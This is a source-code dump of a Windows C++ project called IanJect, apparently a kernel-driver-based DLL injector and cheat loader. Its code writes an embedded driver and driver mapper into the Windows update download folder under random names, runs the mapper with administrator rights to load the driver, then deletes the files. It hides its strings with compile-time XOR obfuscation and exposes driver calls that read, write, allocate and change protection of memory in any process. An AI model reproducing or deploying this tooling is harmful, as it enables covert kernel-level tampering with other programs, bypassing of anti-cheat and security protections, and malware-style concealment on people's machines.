├── Communication
    ├── Utils.h
    ├── api.h
    ├── drvutils.h
    ├── shellcode.h
    └── xor.h
├── Definition
    └── stdafx.h
├── Driver
    ├── defines.h
    ├── driver.cpp
    └── driver.h
├── IanJect.filters
├── IanJect.sln
├── IanJect.vcxproj
├── IanJect.vcxproj.filters
├── IanJect.vcxproj.user
├── Injection
    ├── Utilities.h
    └── injector.h
├── README.md
└── main.cpp


/Communication/Utils.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | #include <string>
 4 | #pragma warning(disable : 4005)
 5 | #include <ntstatus.h>
 6 | #pragma warning(default : 4005)
 7 | 
 8 | inline NTSTATUS last_nt_status()
 9 | {
10 | 	return *(NTSTATUS*)((unsigned char*)NtCurrentTeb() + (0x598 + 0x197 * sizeof(void*)));
11 | }
12 | inline NTSTATUS last_nt_status(NTSTATUS status)
13 | {
14 | 	return *(NTSTATUS*)((unsigned char*)NtCurrentTeb() + (0x598 + 0x197 * sizeof(void*))) = status;
15 | }
16 | class utilit
17 | {
18 | public:
19 | 	static std::wstring get_parent(const std::wstring& path)
20 | 	{
21 | 		if (path.empty())
22 | 			return path;
23 | 
24 | 		auto idx = path.rfind(L'\\');
25 | 		if (idx == path.npos)
26 | 			idx = path.rfind(L'/');
27 | 
28 | 		if (idx != path.npos)
29 | 			return path.substr(0, idx);
30 | 		else
31 | 			return path;
32 | 	}
33 | 	static std::wstring get_exe_directory()
34 | 	{
35 | 		wchar_t imgName[MAX_PATH] = { 0 };
36 | 		GetModuleFileNameW(NULL, imgName, MAX_PATH);
37 | 		return get_parent(imgName);
38 | 	}
39 | 	static NTSTATUS set_priviledge(const LPCWSTR name)
40 | 	{
41 | 		TOKEN_PRIVILEGES Priv, PrivOld;
42 | 		DWORD cbPriv = sizeof(PrivOld);
43 | 		HANDLE hToken;
44 | 
45 | 		if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
46 | 		{
47 | 			if (GetLastError() != ERROR_NO_TOKEN)
48 | 				return last_nt_status();
49 | 
50 | 			if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
51 | 				return last_nt_status();
52 | 		}
53 | 
54 | 		Priv.PrivilegeCount = 1;
55 | 		Priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
56 | 		LookupPrivilegeValueW(NULL, name, &Priv.Privileges[0].Luid);
57 | 
58 | 		if (!AdjustTokenPrivileges(hToken, FALSE, &Priv, sizeof(Priv), &PrivOld, &cbPriv))
59 | 		{
60 | 			CloseHandle(hToken);
61 | 			return last_nt_status();
62 | 		}
63 | 
64 | 		if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
65 | 		{
66 | 			CloseHandle(hToken);
67 | 			return last_nt_status();
68 | 		}
69 | 
70 | 		return STATUS_SUCCESS;
71 | 	}
72 | };
73 | 
74 | 
75 | 
76 | 
77 | 


--------------------------------------------------------------------------------
/Communication/api.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include "shellcode.h"
  3 | 
  4 | #define patch_shell   xor_w(L"\\SoftwareDistribution\\Download\\")
  5 | 
  6 | string random_string()
  7 | {
  8 | 	srand((unsigned int)time((time_t)0));
  9 | 	string str = xor_a("QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm1234567890");
 10 | 	string newstr;
 11 | 	int pos;
 12 | 	while (newstr.size() != 32)
 13 | 	{
 14 | 		pos = ((rand() % (str.size() + 1)));
 15 | 		newstr += str.substr(pos, 1);
 16 | 	}
 17 | 	return newstr + " | discord.gg/bobo";
 18 | }
 19 | 
 20 | wstring random_string_w()
 21 | {
 22 | 	srand((unsigned int)time((time_t)0));
 23 | 	wstring str = xor_w(L"QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm1234567890");
 24 | 	wstring newstr;
 25 | 	int pos;
 26 | 	while (newstr.size() != 5)
 27 | 	{
 28 | 		pos = ((rand() % (str.size() + 1)));
 29 | 		newstr += str.substr(pos, 1);
 30 | 	}
 31 | 	return newstr;
 32 | }
 33 | 
 34 | wstring get_parent(const wstring& path)
 35 | {
 36 | 	if (path.empty())
 37 | 		return path;
 38 | 
 39 | 	auto idx = path.rfind(L'\\');
 40 | 	if (idx == path.npos)
 41 | 		idx = path.rfind(L'/');
 42 | 
 43 | 	if (idx != path.npos)
 44 | 		return path.substr(0, idx);
 45 | 	else
 46 | 		return path;
 47 | }
 48 | 
 49 | wstring get_exe_directory()
 50 | {
 51 | 	wchar_t imgName[MAX_PATH] = { 0 };
 52 | 	DWORD len = ARRAYSIZE(imgName);
 53 | 	QueryFullProcessImageNameW(GetCurrentProcess(), 0, imgName, &len);
 54 | 	wstring sz_dir = (wstring(get_parent(imgName)) + xor_w(L"\\"));
 55 | 	return sz_dir;
 56 | }
 57 | 
 58 | wstring get_files_directory()
 59 | {
 60 | 	WCHAR system_dir[256];
 61 | 	GetWindowsDirectoryW(system_dir, 256);
 62 | 	wstring sz_dir = (wstring(system_dir) + xor_w(L"\\SoftwareDistribution\\Download\\"));
 63 | 	return sz_dir;
 64 | }
 65 | 
 66 | wstring get_random_file_name_directory(wstring type_file)
 67 | {
 68 | 	wstring sz_file = get_files_directory() + random_string_w() + type_file;
 69 | 	return sz_file;
 70 | }
 71 | 
 72 | void run_us_admin(std::wstring sz_exe, bool show)
 73 | {
 74 | 	ShellExecuteW(NULL, xor_w(L"runas"), sz_exe.c_str(), NULL, NULL, show);
 75 | }
 76 | 
 77 | void run_us_admin_and_params(wstring sz_exe, wstring sz_params, bool show)
 78 | {
 79 | 	ShellExecuteW(NULL, xor_w(L"runas"), sz_exe.c_str(), sz_params.c_str(), NULL, show);
 80 | }
 81 | 
 82 | bool drop_mapper(wstring path)
 83 | {
 84 | 	HANDLE h_file;
 85 | 	BOOLEAN b_status = FALSE;
 86 | 	DWORD byte = 0;
 87 | 
 88 | 	h_file = CreateFileW(path.c_str(), GENERIC_ALL, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
 89 | 	if (GetLastError() == ERROR_FILE_EXISTS)
 90 | 		return true;
 91 | 
 92 | 	if (h_file == INVALID_HANDLE_VALUE)
 93 | 		return false;
 94 | 
 95 | 	b_status = WriteFile(h_file, shell_mapper, sizeof(shell_mapper), &byte, nullptr);
 96 | 	CloseHandle(h_file);
 97 | 
 98 | 	if (!b_status)
 99 | 		return false;
100 | 
101 | 	return true;
102 | }
103 | 
104 | bool drop_driver(wstring path)
105 | {
106 | 	HANDLE h_file;
107 | 	BOOLEAN b_status = FALSE;
108 | 	DWORD byte = 0;
109 | 
110 | 	h_file = CreateFileW(path.c_str(), GENERIC_ALL, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
111 | 	if (GetLastError() == ERROR_FILE_EXISTS)
112 | 		return true;
113 | 
114 | 	if (h_file == INVALID_HANDLE_VALUE)
115 | 		return false;
116 | 
117 | 	b_status = WriteFile(h_file, shell_driver, sizeof(shell_driver), &byte, nullptr);
118 | 	CloseHandle(h_file);
119 | 
120 | 	if (!b_status)
121 | 		return false;
122 | 
123 | 	return true;
124 | }
125 | 
126 | wstring get_files_path()
127 | {
128 | 	WCHAR system_dir[256];
129 | 	GetWindowsDirectoryW(system_dir, 256);
130 | 	return (wstring(system_dir) + patch_shell);
131 | }
132 | 
133 | void Mapper()
134 | {
135 | 	wstring sz_driver = get_random_file_name_directory(xor_w(L".sys"));
136 | 	wstring sz_mapper = get_random_file_name_directory(xor_w(L".exe"));
137 | 	wstring sz_params_map = xor_w(L"-map ") + sz_driver;
138 | 
139 | 	DeleteFileW(sz_driver.c_str());
140 | 	DeleteFileW(sz_mapper.c_str());
141 | 
142 | 	Sleep(1000);
143 | 
144 | 	drop_driver(sz_driver);
145 | 	drop_mapper(sz_mapper);
146 | 
147 | 	run_us_admin_and_params(sz_mapper, sz_params_map, false);
148 | 	Sleep(6000);
149 | 
150 | 	DeleteFileW(sz_driver.c_str());
151 | 	DeleteFileW(sz_mapper.c_str());
152 | }
153 | 
154 | 


--------------------------------------------------------------------------------
/Communication/drvutils.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | void DriverInitialization()
 4 | {
 5 | 	DRV().DriverHANDLE();
 6 | 
 7 | 	if (!DRV().isLoaded())
 8 | 	{
 9 | 		cout << xor_a("") << endl;
10 | 		//Kernel();
11 | 		Mapper();
12 | 	}
13 | 
14 | 	DRV().DriverHANDLE();
15 | 	if (DRV().isLoaded())
16 | 	{
17 | 		//cout << xor_a("[+] Driver initialized Successfully...");
18 | 
19 | 		MessageBox(NULL, "[+] Driver initialized Successfully.\n[+] Press 'OK'", "Kernel-Mode", 1);
20 | 
21 | 		//Sleep(2000);
22 | 
23 | 		//system("cls");
24 | 	}
25 | 	else if (!DRV().isLoaded())
26 | 	{
27 | 		MessageBox(NULL, "[-] Driver failed to initialize.\n[-] Restart Your PC", "Kernel-Mode", 1);
28 | 
29 | 		//cout << xor_a("[-] Driver failed to initialize") << endl;
30 | 	}
31 | }


--------------------------------------------------------------------------------
/Communication/xor.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | template <int X> struct EnsureCompileTime {
 4 | 	enum : int {
 5 | 		Value = X
 6 | 	};
 7 | };
 8 | #define Seed ((__TIME__[7] - '0') * 1  + (__TIME__[6] - '0') * 10  + \
 9 | 	(__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
10 | 	(__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
11 | 
12 | __forceinline constexpr int LinearCongruentGenerator(int Rounds) {
13 | 	return 1013904223 + 1664525 * ((Rounds > 0) ? LinearCongruentGenerator(Rounds - 1) : Seed & 0xFFFFFFFF);
14 | }
15 | #define Random() EnsureCompileTime<LinearCongruentGenerator(15)>::Value 
16 | #define RandomNumber(Min, Max) (Min + (Random() % (Max - Min + 1)))
17 | template <int... Pack> struct IndexList {};
18 | template <typename IndexList, int Right> struct Append;
19 | template <int... Left, int Right> struct Append<IndexList<Left...>, Right> {
20 | 	typedef IndexList<Left..., Right> Result;
21 | };
22 | template <int N> struct ConstructIndexList {
23 | 	typedef typename Append<typename ConstructIndexList<N - 1>::Result, N - 1>::Result Result;
24 | };
25 | template <> struct ConstructIndexList<0> {
26 | 	typedef IndexList<> Result;
27 | };
28 | const char XORKEY_A = static_cast<char>(0x13);
29 | const wchar_t XORKEY_W = static_cast<wchar_t>(0x133);
30 | __declspec(noinline)  constexpr char EncryptCharacterA(const char Character, int Index) {
31 | 	return Character ^ (XORKEY_A + Index);
32 | }
33 | template <typename IndexList> class CingA;
34 | template <int... Index> class CingA<IndexList<Index...> > {
35 | private:
36 | 	char Value[sizeof...(Index) + 1];
37 | public:
38 | 	__forceinline constexpr CingA(const char* const String)
39 | 		: Value{ EncryptCharacterA(String[Index], Index)... } {}
40 | 
41 | 	__forceinline char* decrypt() {
42 | 		for (int t = 0; t < sizeof...(Index); t++) {
43 | 			Value[t] = Value[t] ^ (XORKEY_A + t);
44 | 		}
45 | 		Value[sizeof...(Index)] = '\0';
46 | 		return Value;
47 | 	}
48 | 
49 | 	__forceinline char* get() {
50 | 		return Value;
51 | 	}
52 | };
53 | __declspec(noinline) constexpr wchar_t EncryptCharacterW(const wchar_t Character, int Index) {
54 | 	return Character ^ (XORKEY_W + Index);
55 | }
56 | template <typename IndexList> class CingW;
57 | template <int... Index> class CingW<IndexList<Index...> > {
58 | private:
59 | 	wchar_t Value[sizeof...(Index) + 1];
60 | public:
61 | 	__forceinline constexpr CingW(const wchar_t* const String)
62 | 		: Value{ EncryptCharacterW(String[Index], Index)... } {}
63 | 
64 | 	__forceinline wchar_t* decrypt() {
65 | 		for (int t = 0; t < sizeof...(Index); t++) {
66 | 			Value[t] = Value[t] ^ (XORKEY_W + t);
67 | 		}
68 | 		Value[sizeof...(Index)] = '\0\0';
69 | 		return Value;
70 | 	}
71 | 
72 | 	__forceinline wchar_t* get() {
73 | 		return Value;
74 | 	}
75 | };
76 | 
77 | #define xor_a( String ) ( CingA<ConstructIndexList<sizeof( String ) - 1>::Result>( String ).decrypt() )  
78 | #define xor_w( String ) ( CingW<ConstructIndexList<sizeof( String ) - 1>::Result>( String ).decrypt() )  
79 | 


--------------------------------------------------------------------------------
/Definition/stdafx.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <string>
 3 | #include <vector>
 4 | #include <mutex>
 5 | #include <fstream>
 6 | #include <regex>
 7 | #include <map>
 8 | 
 9 | #include <windows.h>
10 | #include <tlhelp32.h>
11 | #include <psapi.h>
12 | #include <shlwapi.h>
13 | #include <shellapi.h>
14 | 
15 | #include <Windows.h>
16 | #include <iostream>
17 | #include <vector>
18 | #include <memory>
19 | #include <chrono>
20 | #include <thread>
21 | #include <mutex>	
22 | #include <math.h>
23 | #include <string>
24 | #include <sstream>
25 | #include <fstream>
26 | #include <stdint.h>
27 | #include <Shlobj.h>
28 | #include <random>
29 | #include <dwmapi.h>
30 | #include <stdio.h>
31 | #include <accctrl.h>
32 | #include <aclapi.h>
33 | #include <shlobj_core.h>
34 | #include <locale>
35 | #include <codecvt>
36 | #include <thread>
37 | #include <filesystem>
38 | #include <array>
39 | #include <Aclapi.h>
40 | #include <sddl.h>
41 | #pragma comment(lib, "shlwapi.lib")
42 | #pragma comment(lib, "ntdll.lib")
43 | #pragma comment(lib, "Advapi32.lib")
44 | 
45 | using namespace std;
46 | #define StrToWStr(s) (wstring(s, &s[strlen(s)]).c_str())
47 | extern "C" NTSYSAPI PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID Base);
48 | 
49 | 


--------------------------------------------------------------------------------
/Driver/defines.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | ///////////////////////////////////////////////////////////
 4 | #define offset_io_mirrore   0x2338
 5 | #define file_device_mirrore 0x3009
 6 | ///////////////////////////////////////////////////////////
 7 | 
 8 | ///////////////////////////////////////////////////////////
 9 | #define ioctl_get_module_information (ULONG)CTL_CODE(file_device_mirrore, offset_io_mirrore + 0x0010, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
10 | #define ioctl_copy_memory (ULONG)CTL_CODE(file_device_mirrore, offset_io_mirrore + 0x0050, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
11 | #define ioctl_protect_memory (ULONG)CTL_CODE(file_device_mirrore, offset_io_mirrore + 0x0100, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
12 | #define ioctl_alloc_memory (ULONG)CTL_CODE(file_device_mirrore, offset_io_mirrore + 0x0150, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
13 | #define ioctl_free_memory (ULONG)CTL_CODE(file_device_mirrore, offset_io_mirrore + 0x0200, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
14 | ///////////////////////////////////////////////////////////
15 | 
16 | ///////////////////////////////////////////////////////////
17 | typedef struct _set_module_information
18 | {
19 | 	ULONG pid;
20 | 	wchar_t sz_name[32];
21 | } set_module_information, *pset_module_information;
22 | 
23 | typedef struct _get_module_information
24 | {
25 | 	ULONGLONG base_image;
26 | 	ULONGLONG size_of_image;
27 | } get_module_information, *pget_module_information;
28 | 
29 | typedef struct _copy_memory
30 | {
31 | 	ULONGLONG buffer;
32 | 	ULONGLONG address;
33 | 	ULONGLONG size;
34 | 	ULONG pid;
35 | 	BOOLEAN write;
36 | } copy_memory, *pcopy_memory;
37 | 
38 | typedef struct _protect_memory
39 | {
40 | 	ULONG pid;
41 | 	ULONGLONG address;
42 | 	ULONGLONG size;
43 | 	PDWORD new_protect;
44 | } protect_memory, *pprotect_memory;
45 | 
46 | typedef struct _alloc_memory
47 | {
48 | 	ULONG pid;
49 | 	ULONGLONG out_address;
50 | 	ULONGLONG size;
51 | 	ULONG protect;
52 | } alloc_memory, *palloc_memory;
53 | 
54 | typedef struct _free_memory
55 | {
56 | 	ULONG pid;
57 | 	ULONGLONG address;
58 | } free_memory, *pfree_memory;
59 | ///////////////////////////////////////////////////////////
60 | 
61 | 


--------------------------------------------------------------------------------
/Driver/driver.cpp:
--------------------------------------------------------------------------------
  1 | #include "driver.h"
  2 | #include "../Communication/xor.h"
  3 | 
  4 | #define DVR_DEVICE_FILE xor_w(L"\\\\.\\EIQDV") 
  5 | 
  6 | DriverClass::DriverClass()
  7 | {
  8 | /**/
  9 | }
 10 | NTSTATUS DriverClass::send_serivce(ULONG ioctl_code, LPVOID io, DWORD size)
 11 | {
 12 | 	if (DRIVERHANDLE == INVALID_HANDLE_VALUE)
 13 | 		return STATUS_DEVICE_DOES_NOT_EXIST;
 14 | 
 15 | 	if (!DeviceIoControl(DRIVERHANDLE, ioctl_code, io, size, nullptr, 0, NULL, NULL))
 16 | 		return STATUS_UNSUCCESSFUL;
 17 | 
 18 | 	return STATUS_SUCCESS;
 19 | }
 20 | void DriverClass::AttachToProcess(DWORD pid)
 21 | {
 22 | 	ProcID = pid;
 23 | }
 24 | NTSTATUS DriverClass::get_module_information_ex(const wchar_t* name, pget_module_information mod)
 25 | {
 26 | 	if (DRIVERHANDLE == INVALID_HANDLE_VALUE)
 27 | 		return STATUS_DEVICE_DOES_NOT_EXIST;
 28 | 	
 29 | 	set_module_information req = { 0 };
 30 | 
 31 | 	req.pid = ProcID;
 32 | 	wcscpy_s(req.sz_name, name);
 33 | 
 34 | 	if (!DeviceIoControl(DRIVERHANDLE, ioctl_get_module_information, &req, sizeof(req), mod, sizeof(get_module_information), 0, NULL))
 35 | 		return STATUS_UNSUCCESSFUL;
 36 | 
 37 | 	return STATUS_SUCCESS;
 38 | }
 39 | NTSTATUS DriverClass::read_memory_ex(PVOID base, PVOID buffer, DWORD size)
 40 | {
 41 | 	copy_memory req = { 0 };
 42 | 
 43 | 	req.pid = ProcID;
 44 | 	req.address = reinterpret_cast<ULONGLONG>(base);
 45 | 	req.buffer = reinterpret_cast<ULONGLONG>(buffer);
 46 | 	req.size = (uint64_t)size;
 47 | 	req.write = FALSE;
 48 | 
 49 | 	return send_serivce(ioctl_copy_memory, &req, sizeof(req));
 50 | }
 51 | NTSTATUS DriverClass::write_memory_ex(PVOID base, PVOID buffer, DWORD size)
 52 | {
 53 | 	copy_memory Request = { 0 };
 54 | 
 55 | 	Request.pid = ProcID;
 56 | 	Request.address = reinterpret_cast<ULONGLONG>(base);
 57 | 	Request.buffer = reinterpret_cast<ULONGLONG>(buffer);
 58 | 	Request.size = (uint64_t)size;
 59 | 	Request.write = TRUE;
 60 | 
 61 | 	return send_serivce(ioctl_copy_memory, &Request, sizeof(Request));
 62 | }
 63 | NTSTATUS DriverClass::protect_memory_ex(uint64_t base, uint64_t size, PDWORD protection)
 64 | {
 65 | 	protect_memory Request = { 0 };
 66 | 
 67 | 	Request.pid = ProcID;
 68 | 	Request.address = base;
 69 | 	Request.size = size;
 70 | 	Request.new_protect = protection;
 71 | 
 72 | 	return send_serivce(ioctl_protect_memory, &Request, sizeof(Request));
 73 | }
 74 | PVOID DriverClass::alloc_memory_ex(DWORD size, DWORD protect)
 75 | {
 76 | 	PVOID p_out_address = NULL;
 77 | 	alloc_memory req = { 0 };
 78 | 
 79 | 	req.pid = ProcID;
 80 | 	req.out_address = reinterpret_cast<ULONGLONG>(&p_out_address);
 81 | 	req.size = size;
 82 | 	req.protect = protect;
 83 | 
 84 | 	send_serivce(ioctl_alloc_memory, &req, sizeof(req));
 85 | 
 86 | 	return p_out_address;
 87 | }
 88 | NTSTATUS DriverClass::free_memory_ex(PVOID address)
 89 | {
 90 | 	free_memory req = { 0 };
 91 | 
 92 | 	req.pid = ProcID;
 93 | 	req.address = reinterpret_cast<ULONGLONG>(address);
 94 | 
 95 | 	return send_serivce(ioctl_free_memory, &req, sizeof(req));
 96 | }
 97 | void DriverClass::DriverHANDLE()
 98 | {
 99 | 	DRIVERHANDLE = CreateFileW(DVR_DEVICE_FILE, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
100 | }
101 | DriverClass::~DriverClass()
102 | {
103 | 	CloseHandle(DRIVERHANDLE);
104 | }
105 | DriverClass& DriverClass::singleton()
106 | {
107 | 	static DriverClass p_object;
108 | 	return p_object;
109 | }


--------------------------------------------------------------------------------
/Driver/driver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | #include <string>
 4 | #pragma warning(disable : 4005)
 5 | #include <ntstatus.h>
 6 | #pragma warning(default : 4005)
 7 | #include "defines.h"
 8 | 
 9 | class DriverClass
10 | {
11 | public:
12 | 	DriverClass();
13 | 	~DriverClass();
14 | 
15 | 	DWORD ProcID = 0;
16 | 
17 | 	static   DriverClass& singleton();
18 | 	void     DriverHANDLE();
19 | 	void     AttachToProcess(DWORD pid);
20 | 
21 | 	NTSTATUS send_serivce(ULONG ioctl_code, LPVOID io, DWORD size);
22 | 	NTSTATUS get_module_information_ex(const wchar_t* name, pget_module_information mod);
23 | 	NTSTATUS read_memory_ex(PVOID base, PVOID buffer, DWORD size);
24 | 	NTSTATUS write_memory_ex(PVOID base, PVOID buffer, DWORD size);
25 | 	NTSTATUS protect_memory_ex(uint64_t base, uint64_t size, PDWORD protection);
26 | 	PVOID    alloc_memory_ex(DWORD size, DWORD protect);
27 | 	NTSTATUS free_memory_ex(PVOID address);
28 | 	
29 | 	inline bool isLoaded()  const { return DRIVERHANDLE != INVALID_HANDLE_VALUE; }
30 | private:	
31 | 	DriverClass(const DriverClass&) = delete;
32 | 	DriverClass& operator = (const DriverClass&) = delete;
33 | 	HANDLE   DRIVERHANDLE = INVALID_HANDLE_VALUE;
34 | };
35 | 
36 | inline DriverClass& DRV()
37 | {
38 | 	return DriverClass::singleton();
39 | }
40 | 
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/IanJect.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Исходные файлы">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Файлы заголовков">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Файлы ресурсов">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |     <Filter Include="api">
17 |       <UniqueIdentifier>{a9695745-c439-4acc-81b1-5c36f8b434d9}</UniqueIdentifier>
18 |     </Filter>
19 |     <Filter Include="define">
20 |       <UniqueIdentifier>{6cd4550f-57b9-4e67-93ea-c50e7e160389}</UniqueIdentifier>
21 |     </Filter>
22 |     <Filter Include="driver">
23 |       <UniqueIdentifier>{cba38fdc-d3f0-4d79-912e-2a3ca2db764e}</UniqueIdentifier>
24 |     </Filter>
25 |     <Filter Include="inject">
26 |       <UniqueIdentifier>{f22c3326-6a1a-41d6-9185-5153a28031c8}</UniqueIdentifier>
27 |     </Filter>
28 |   </ItemGroup>
29 |   <ItemGroup>
30 |     <ClInclude Include="api\api.h">
31 |       <Filter>api</Filter>
32 |     </ClInclude>
33 |     <ClInclude Include="api\drvutils.h">
34 |       <Filter>api</Filter>
35 |     </ClInclude>
36 |     <ClInclude Include="api\shellcode.h">
37 |       <Filter>api</Filter>
38 |     </ClInclude>
39 |     <ClInclude Include="api\utilit.h">
40 |       <Filter>api</Filter>
41 |     </ClInclude>
42 |     <ClInclude Include="define\stdafx.h">
43 |       <Filter>define</Filter>
44 |     </ClInclude>
45 |     <ClInclude Include="inject\injector.h">
46 |       <Filter>inject</Filter>
47 |     </ClInclude>
48 |     <ClInclude Include="inject\utils.h">
49 |       <Filter>inject</Filter>
50 |     </ClInclude>
51 |     <ClInclude Include="driver\defines.h">
52 |       <Filter>driver</Filter>
53 |     </ClInclude>
54 |     <ClInclude Include="driver\driver.h">
55 |       <Filter>driver</Filter>
56 |     </ClInclude>
57 |     <ClInclude Include="api\xor.h">
58 |       <Filter>api</Filter>
59 |     </ClInclude>
60 |   </ItemGroup>
61 |   <ItemGroup>
62 |     <ClCompile Include="driver\driver.cpp">
63 |       <Filter>driver</Filter>
64 |     </ClCompile>
65 |     <ClCompile Include="main.cpp">
66 |       <Filter>Исходные файлы</Filter>
67 |     </ClCompile>
68 |   </ItemGroup>
69 | </Project>


--------------------------------------------------------------------------------
/IanJect.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30907.101
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "IanJect", "IanJect.vcxproj", "{A0EDD2AC-09C4-46E4-88D7-9B369952317C}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Debug|x64.Build.0 = Debug|x64
18 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Debug|x86.Build.0 = Debug|Win32
20 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Release|x64.ActiveCfg = Release|x64
21 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Release|x64.Build.0 = Release|x64
22 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Release|x86.ActiveCfg = Release|Win32
23 | 		{A0EDD2AC-09C4-46E4-88D7-9B369952317C}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {9A905BA2-156D-40E5-81B7-1582592B18C4}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/IanJect.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <ItemGroup>
 22 |     <ClInclude Include="Communication\api.h" />
 23 |     <ClInclude Include="Communication\drvutils.h" />
 24 |     <ClInclude Include="Communication\shellcode.h" />
 25 |     <ClInclude Include="Communication\Utils.h" />
 26 |     <ClInclude Include="Communication\xor.h" />
 27 |     <ClInclude Include="Definition\stdafx.h" />
 28 |     <ClInclude Include="Driver\defines.h" />
 29 |     <ClInclude Include="Driver\driver.h" />
 30 |     <ClInclude Include="Injection\injector.h" />
 31 |     <ClInclude Include="Injection\Utilities.h" />
 32 |   </ItemGroup>
 33 |   <ItemGroup>
 34 |     <ClCompile Include="Driver\driver.cpp" />
 35 |     <ClCompile Include="main.cpp" />
 36 |   </ItemGroup>
 37 |   <PropertyGroup Label="Globals">
 38 |     <VCProjectVersion>15.0</VCProjectVersion>
 39 |     <ProjectGuid>{A0EDD2AC-09C4-46E4-88D7-9B369952317C}</ProjectGuid>
 40 |     <RootNamespace>faceinjectorv2</RootNamespace>
 41 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 42 |     <ProjectName>Enject</ProjectName>
 43 |   </PropertyGroup>
 44 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 45 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 46 |     <ConfigurationType>Application</ConfigurationType>
 47 |     <UseDebugLibraries>true</UseDebugLibraries>
 48 |     <PlatformToolset>v143</PlatformToolset>
